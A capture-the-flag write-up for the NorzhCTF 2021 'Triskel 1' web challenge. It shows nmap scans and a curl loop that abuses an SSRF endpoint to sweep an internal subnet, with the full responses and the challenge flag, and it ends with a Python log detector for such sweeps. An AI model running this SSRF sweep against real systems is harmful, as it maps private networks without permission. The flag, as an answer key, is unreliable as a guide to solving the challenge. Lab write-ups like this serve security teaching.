NorzhCTF 2021: Triskel 1: First contact

Category: Airport hall/web

20 points

Coronavirus affected our airport so much that our dev team developed an app to keep track of it! I mean they didn’t have much time to make it, but what could go wrong?

by Remsio

Solution

I started with an nmap scan of the network from which the ping came in the Discovery challenge.

root@slon:~# nmap -sP 10.45.4.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-22 11:45 CEST
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 256 undergoing Ping Scan
Ping Scan Timing: About 7.32% done; ETC: 11:49 (0:03:10 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (0 up), 256 undergoing Ping Scan
Ping Scan Timing: About 12.21% done; ETC: 11:49 (0:03:00 remaining)
Nmap scan report for 10.45.4.38
Host is up (0.041s latency).
Nmap scan report for 10.45.4.39
Host is up (0.040s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 68.72 seconds
root@slon:~# nmap -sV 10.45.4.38 10.45.4.39
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-22 11:47 CEST
Nmap scan report for 10.45.4.38
Host is up (0.038s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8100/tcp open  http    Apache httpd 2.4.33 ((Unix))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.45.4.39
Host is up (0.038s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 13.33 seconds

Great, it looks like an Apache httpd is running on 10.45.4.38:8100, let’s check it…

After a quick look around I found an interesting backend URL - http://10.45.4.38:8100/api/call_api.php?api=10.0.42.100/api/.

I decided not to do anything fancy and just iterate over the URLs with curl (the URL is quoted so the shell does not try to expand the ? in it)…

for i in {1..255}; do curl -s "http://10.45.4.38:8100/api/call_api.php?api=10.0.42.${i}"; echo; done

Whole output below:

Cant connect to API : 10.0.42.1

<!DOCTYPE html>
<html lang="fr" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Medisin</title>
    <link rel="stylesheet" href="css/bootstrap.min.css"></link>
    <link rel="icon" type="image/png" href="images/triskele.png" />
  </head>
  <body>

    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
      <a class="navbar-brand" href="/">
        <img src="images/triskele.png" width="30" height="30" class="d-inline-block align-top" alt=""> Brittany
      </a>
      <div class="collapse navbar-collapse" id="navbarNav">
        <ul class="navbar-nav">
          <li class="nav-item">
            <a class="nav-link" href="/outside_of_brittany.php">Outside of Brittany</a>
          </li>
                  </ul>
      </div>
             <form class="form-inline my-2 my-lg-0" method="post" action="/">
         <input class="form-control mr-sm-2" type="text" name="username" placeholder="Username">
         <input class="form-control mr-sm-2" type="password" name="password" placeholder="Password">
         <button class="btn btn-outline-success my-2 my-sm-0" type="submit">Se connecter</button>
       </form>
          </nav>

    <div class="container">
      <h1>Medisin</h1>
      <p>Medisin is your friendly medical media to keep you in touch with Corona virus news in Brittany.</p>
          <h2>01 March 2021, 15:23:38</h2>
    <img src="images/bretagne.png"/>
    <p>1218 new positive cases during the last 72h in Brittany.</p>

    <h2>03 March 2021, 08:52:23</h2>
    <img src="images/epidemie.jpeg"/>
    <p>1200 new positive cases in only 48 hours in Brittany, unfortunatly it looks like we are getting closer to a new lockdown.</p>

    <h2>03 March 2021, 16:04:32</h2>
    <img src="images/corona_6_pack.jpg"/>
    <p>To keep you in touch about the Brittany news, we use multiple APIs and sort the best information just for you!</p>

    </div>

     <script type="text/javascript" src="js/jquery.min.js"></script>
     <script type="text/javascript" src="js/bootstrap.min.js"></script>
  </body>
</html>

Cant connect to API : 10.0.42.3
Cant connect to API : 10.0.42.4
Cant connect to API : 10.0.42.5
Cant connect to API : 10.0.42.6
Cant connect to API : 10.0.42.7
Cant connect to API : 10.0.42.8
Cant connect to API : 10.0.42.9
Cant connect to API : 10.0.42.10
Cant connect to API : 10.0.42.11
Cant connect to API : 10.0.42.12
Cant connect to API : 10.0.42.13
Cant connect to API : 10.0.42.14
Cant connect to API : 10.0.42.15
Cant connect to API : 10.0.42.16
Cant connect to API : 10.0.42.17
Cant connect to API : 10.0.42.18
Cant connect to API : 10.0.42.19
Cant connect to API : 10.0.42.20
Cant connect to API : 10.0.42.21
Cant connect to API : 10.0.42.22
Cant connect to API : 10.0.42.23
Cant connect to API : 10.0.42.24
Cant connect to API : 10.0.42.25
Cant connect to API : 10.0.42.26
Cant connect to API : 10.0.42.27
Cant connect to API : 10.0.42.28
Cant connect to API : 10.0.42.29
Cant connect to API : 10.0.42.30
Cant connect to API : 10.0.42.31
Cant connect to API : 10.0.42.32
Cant connect to API : 10.0.42.33
Cant connect to API : 10.0.42.34
Cant connect to API : 10.0.42.35
Cant connect to API : 10.0.42.36
Cant connect to API : 10.0.42.37
Cant connect to API : 10.0.42.38
Cant connect to API : 10.0.42.39
Cant connect to API : 10.0.42.40
Cant connect to API : 10.0.42.41
Cant connect to API : 10.0.42.42
Cant connect to API : 10.0.42.43
Cant connect to API : 10.0.42.44
Cant connect to API : 10.0.42.45
Cant connect to API : 10.0.42.46
Cant connect to API : 10.0.42.47
Cant connect to API : 10.0.42.48
Cant connect to API : 10.0.42.49
Cant connect to API : 10.0.42.50
Cant connect to API : 10.0.42.51
Cant connect to API : 10.0.42.52
Cant connect to API : 10.0.42.53
Cant connect to API : 10.0.42.54
Cant connect to API : 10.0.42.55
Cant connect to API : 10.0.42.56
Cant connect to API : 10.0.42.57
Cant connect to API : 10.0.42.58
Cant connect to API : 10.0.42.59
Cant connect to API : 10.0.42.60
Cant connect to API : 10.0.42.61
Cant connect to API : 10.0.42.62
Cant connect to API : 10.0.42.63
Cant connect to API : 10.0.42.64
Cant connect to API : 10.0.42.65
Cant connect to API : 10.0.42.66
Cant connect to API : 10.0.42.67
Cant connect to API : 10.0.42.68
Cant connect to API : 10.0.42.69
Cant connect to API : 10.0.42.70
Cant connect to API : 10.0.42.71
Cant connect to API : 10.0.42.72
Cant connect to API : 10.0.42.73
Cant connect to API : 10.0.42.74
Cant connect to API : 10.0.42.75
Cant connect to API : 10.0.42.76
Cant connect to API : 10.0.42.77
Cant connect to API : 10.0.42.78
Cant connect to API : 10.0.42.79
Cant connect to API : 10.0.42.80
Cant connect to API : 10.0.42.81
Cant connect to API : 10.0.42.82
Cant connect to API : 10.0.42.83
Cant connect to API : 10.0.42.84
Cant connect to API : 10.0.42.85
Cant connect to API : 10.0.42.86
Cant connect to API : 10.0.42.87
Cant connect to API : 10.0.42.88
Cant connect to API : 10.0.42.89
Cant connect to API : 10.0.42.90
Cant connect to API : 10.0.42.91
Cant connect to API : 10.0.42.92
Cant connect to API : 10.0.42.93
Cant connect to API : 10.0.42.94
Cant connect to API : 10.0.42.95
Cant connect to API : 10.0.42.96
Cant connect to API : 10.0.42.97
Cant connect to API : 10.0.42.98
Cant connect to API : 10.0.42.99
<!DOCTYPE html>
<html lang="en">
<head>
    <title>Working!</title>
</head>
<body>
    <h1>Working!</h1>
</body>
</html>
Cant connect to API : 10.0.42.101
Cant connect to API : 10.0.42.102
Cant connect to API : 10.0.42.103
Cant connect to API : 10.0.42.104
Cant connect to API : 10.0.42.105
Cant connect to API : 10.0.42.106
Cant connect to API : 10.0.42.107
Cant connect to API : 10.0.42.108
Cant connect to API : 10.0.42.109
Cant connect to API : 10.0.42.110
Cant connect to API : 10.0.42.111
Cant connect to API : 10.0.42.112
Cant connect to API : 10.0.42.113
Cant connect to API : 10.0.42.114
Cant connect to API : 10.0.42.115
Cant connect to API : 10.0.42.116
Cant connect to API : 10.0.42.117
Cant connect to API : 10.0.42.118
Cant connect to API : 10.0.42.119
Cant connect to API : 10.0.42.120
Cant connect to API : 10.0.42.121
Cant connect to API : 10.0.42.122
Cant connect to API : 10.0.42.123
Cant connect to API : 10.0.42.124
Cant connect to API : 10.0.42.125
Cant connect to API : 10.0.42.126
Cant connect to API : 10.0.42.127
Cant connect to API : 10.0.42.128
Cant connect to API : 10.0.42.129
Cant connect to API : 10.0.42.130
Cant connect to API : 10.0.42.131
Cant connect to API : 10.0.42.132
Cant connect to API : 10.0.42.133
Cant connect to API : 10.0.42.134
Cant connect to API : 10.0.42.135
Cant connect to API : 10.0.42.136
Cant connect to API : 10.0.42.137
Cant connect to API : 10.0.42.138
Cant connect to API : 10.0.42.139
Cant connect to API : 10.0.42.140
Cant connect to API : 10.0.42.141
Cant connect to API : 10.0.42.142
Cant connect to API : 10.0.42.143
Cant connect to API : 10.0.42.144
Cant connect to API : 10.0.42.145
Cant connect to API : 10.0.42.146
Cant connect to API : 10.0.42.147
Cant connect to API : 10.0.42.148
Cant connect to API : 10.0.42.149
Cant connect to API : 10.0.42.150
Cant connect to API : 10.0.42.151
Cant connect to API : 10.0.42.152
Cant connect to API : 10.0.42.153
Cant connect to API : 10.0.42.154
Cant connect to API : 10.0.42.155
Cant connect to API : 10.0.42.156
Cant connect to API : 10.0.42.157
Cant connect to API : 10.0.42.158
Cant connect to API : 10.0.42.159
Cant connect to API : 10.0.42.160
Cant connect to API : 10.0.42.161
Cant connect to API : 10.0.42.162
Cant connect to API : 10.0.42.163
Cant connect to API : 10.0.42.164
Cant connect to API : 10.0.42.165
Cant connect to API : 10.0.42.166
Cant connect to API : 10.0.42.167
Cant connect to API : 10.0.42.168
Cant connect to API : 10.0.42.169
Cant connect to API : 10.0.42.170
Cant connect to API : 10.0.42.171
Cant connect to API : 10.0.42.172
Cant connect to API : 10.0.42.173
Cant connect to API : 10.0.42.174
Cant connect to API : 10.0.42.175
Cant connect to API : 10.0.42.176
Cant connect to API : 10.0.42.177
Cant connect to API : 10.0.42.178
Cant connect to API : 10.0.42.179
Cant connect to API : 10.0.42.180
Cant connect to API : 10.0.42.181
Cant connect to API : 10.0.42.182
Cant connect to API : 10.0.42.183
Cant connect to API : 10.0.42.184
Cant connect to API : 10.0.42.185
Cant connect to API : 10.0.42.186
Cant connect to API : 10.0.42.187
Cant connect to API : 10.0.42.188
Cant connect to API : 10.0.42.189
Cant connect to API : 10.0.42.190
Cant connect to API : 10.0.42.191
Cant connect to API : 10.0.42.192
Cant connect to API : 10.0.42.193
Cant connect to API : 10.0.42.194
Cant connect to API : 10.0.42.195
Cant connect to API : 10.0.42.196
Cant connect to API : 10.0.42.197
Cant connect to API : 10.0.42.198
Cant connect to API : 10.0.42.199
<!DOCTYPE html>
<html lang="fr" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Kontammadur</title>
    <link rel="stylesheet" href="css/bootstrap.min.css"></link>
    <link rel="icon" type="image/png" href="images/triskele.png" />
    <link rel="stylesheet" href="css/style.css"></link>
  </head>
  <body>
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
      <a class="navbar-brand" href="/">
        <img src="images/triskele.png" width="30" height="30" class="d-inline-block align-top" alt=""> Kontammadur
      </a>

    </nav>

      <div class="container">
        <form action="/" method="get">
          <div class="form-row align-items-center">
            <label class="my-1 mr-2" for="inlineFormCustomSelectPref">Rechercher par pseudo</label>
            <input type="text" name="search">

            <button type="submit" class="btn btn-primary my-1">Chercher</button>
          </div>
        </form>
            <div class="chat">
     <div><img src="/images/frustrated.svg" alt="Avatar"><b>admin_richard_lauren</b></div>
     <p>There are 29 corona cases in our enterprise Kontammadur!!</p>
     <span class="time-left">vendredi 28 février 2020, 20:42:00</span>
    </div>

        <div class="chat">
     <div><img src="/images/frustrated.svg" alt="Avatar"><b>admin_denis_valette</b></div>
     <p>Where is it?? Is it in Vannes?</p>
     <span class="time-left">lundi 2 mars 2020, 09:25:40</span>
    </div>

        <div class="chat">
     <div><img src="/images/frustrated.svg" alt="Avatar"><b>admin_denis_valette</b></div>
     <p>Yes it's in Vannes, what are you waiting for, contact quickly the head of the airport, they can't let people leave anymore!</p>
     <span class="time-left">mardi 3 mars 2020, 13:10:08</span>
    </div>

        <div class="chat">
     <div><img src="/images/frustrated.svg" alt="Avatar"><b>dev_pomeroy_dagenais</b></div>
     <p>Hum guys? Did you notice that the dev_leroy_bedart is currently doing some strange stuff on our production server? I blocked him and closed the prod just in case, please don't respond to strange mails..</p>
     <span class="time-left">jeudi 5 mars 2020, 12:39:12</span>
    </div>

        <div class="chat">
     <div><img src="/images/frustrated.svg" alt="Avatar"><b>dev_pomeroy_dagenais</b></div>
     <p>Oh and also I saw this on the news: NORZH{You_just_SSRFed_your_way_in!!!}, do you know what NORZH is? </p>
     <span class="time-left">jeudi 5 mars 2020, 12:39:12</span>
    </div>

    
        <form action="/" method="post">
          <div class="form-group">
            <input type="text" class="form-control" id="" placeholder="Message">
            <button type="submit" class="btn btn-primary">Envoyer</button>
          </div>
        </form>

      </div>

      <script type="text/javascript" src="js/jquery.min.js"></script>
      <script type="text/javascript" src="js/bootstrap.min.js"></script>
  </body>
</html>

Cant connect to API : 10.0.42.201
Cant connect to API : 10.0.42.202
Cant connect to API : 10.0.42.203
Cant connect to API : 10.0.42.204
Cant connect to API : 10.0.42.205
Cant connect to API : 10.0.42.206
Cant connect to API : 10.0.42.207
Cant connect to API : 10.0.42.208
Cant connect to API : 10.0.42.209
Cant connect to API : 10.0.42.210
Cant connect to API : 10.0.42.211
Cant connect to API : 10.0.42.212
Cant connect to API : 10.0.42.213
Cant connect to API : 10.0.42.214
Cant connect to API : 10.0.42.215
Cant connect to API : 10.0.42.216
Cant connect to API : 10.0.42.217
Cant connect to API : 10.0.42.218
Cant connect to API : 10.0.42.219
Cant connect to API : 10.0.42.220
Cant connect to API : 10.0.42.221
Cant connect to API : 10.0.42.222
Cant connect to API : 10.0.42.223
Cant connect to API : 10.0.42.224
Cant connect to API : 10.0.42.225
Cant connect to API : 10.0.42.226
Cant connect to API : 10.0.42.227
Cant connect to API : 10.0.42.228
Cant connect to API : 10.0.42.229
Cant connect to API : 10.0.42.230
Cant connect to API : 10.0.42.231
Cant connect to API : 10.0.42.232
Cant connect to API : 10.0.42.233
Cant connect to API : 10.0.42.234
Cant connect to API : 10.0.42.235
Cant connect to API : 10.0.42.236
Cant connect to API : 10.0.42.237
Cant connect to API : 10.0.42.238
Cant connect to API : 10.0.42.239
Cant connect to API : 10.0.42.240
Cant connect to API : 10.0.42.241
Cant connect to API : 10.0.42.242
Cant connect to API : 10.0.42.243
Cant connect to API : 10.0.42.244
Cant connect to API : 10.0.42.245
Cant connect to API : 10.0.42.246
Cant connect to API : 10.0.42.247
Cant connect to API : 10.0.42.248
Cant connect to API : 10.0.42.249
Cant connect to API : 10.0.42.250
Cant connect to API : 10.0.42.251
Cant connect to API : 10.0.42.252
Cant connect to API : 10.0.42.253
Cant connect to API : 10.0.42.254
Cant connect to API : 10.0.42.255

Summary:

  • 10.0.42.1 - the Medisin site itself, the one that is “visible” from the outside as 10.45.4.38:8100
  • 10.0.42.100 - the API the web page calls
  • 10.0.42.200 - a chat service (Kontammadur), where the flag is placed ;-)

Flag

NORZH{You_just_SSRFed_your_way_in!!!}
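Seen from the other side, the curl loop above leaves a very recognisable trace on the proxying host: one client asking call_api.php to fetch hundreds of different targets within a few minutes, while a real user of the page only ever asks for the one API it was built to call. The following is an added example (not part of the original writeup) of a detector for that pattern over Apache access log lines; the log lines, client addresses and timestamps are constructed to mimic what the loop would produce, and the window and threshold are assumptions to tune per site.

```python
"""Find an SSRF host sweep, like the curl loop in this writeup, in access logs.

Added example, not part of the original writeup. The log lines are
constructed to look like what
`for i in {1..255}; do curl .../call_api.php?api=10.0.42.${i}` would leave
in the Apache access log of the proxying host; client addresses, times and
the legitimate client's requests are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Apache combined log format, fields up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (client_ip, timestamp, request_path), or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"]


def api_target(path):
    """Return the `api` value of a /api/call_api.php request, else None."""
    parts = urlsplit(path)
    if parts.path != "/api/call_api.php":
        return None
    values = parse_qs(parts.query).get("api")
    return values[0] if values else None


def find_sweeps(lines, window=timedelta(minutes=5), threshold=20):
    """Map client IP -> most distinct `api` targets requested within `window`.

    Only clients that reach `threshold` distinct targets are reported. A
    normal user asks for one or two fixed APIs; dozens of different hosts in
    a few minutes is the signature of a sweep through the proxy.
    """
    per_client = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path = parsed
        target = api_target(path)
        if target is not None:
            per_client[ip].append((ts, target))

    hits = {}
    for ip, events in per_client.items():
        events.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({t for _, t in events[start:end + 1]})
            if distinct >= threshold:
                hits[ip] = max(hits.get(ip, 0), distinct)
    return hits


def build_sample_log():
    """Constructed log: one client sweeping 10.0.42.1-30, one normal user."""
    t0 = datetime(2021, 5, 22, 11, 52, 0, tzinfo=timezone(timedelta(hours=2)))
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512 "-" "{ua}"'
    lines = []
    for i in range(1, 31):
        lines.append(fmt.format(
            ip="198.51.100.7",
            ts=(t0 + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S %z"),
            path=f"/api/call_api.php?api=10.0.42.{i}", ua="curl/7.68.0"))
    for i in range(5):
        lines.append(fmt.format(
            ip="203.0.113.9",
            ts=(t0 + timedelta(minutes=i)).strftime("%d/%b/%Y:%H:%M:%S %z"),
            path="/api/call_api.php?api=10.0.42.100/api/", ua="Mozilla/5.0"))
    lines.append('203.0.113.9 - - [22/May/2021:11:58:00 +0200] '
                 '"GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    print(find_sweeps(build_sample_log()))
```

The internal hosts being swept would log the web server’s own address as the client, so this has to run on the proxying host (or on whatever collects its access logs); a low threshold combined with a short window keeps a legitimate page that calls a handful of APIs out of the results.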

luc © 2021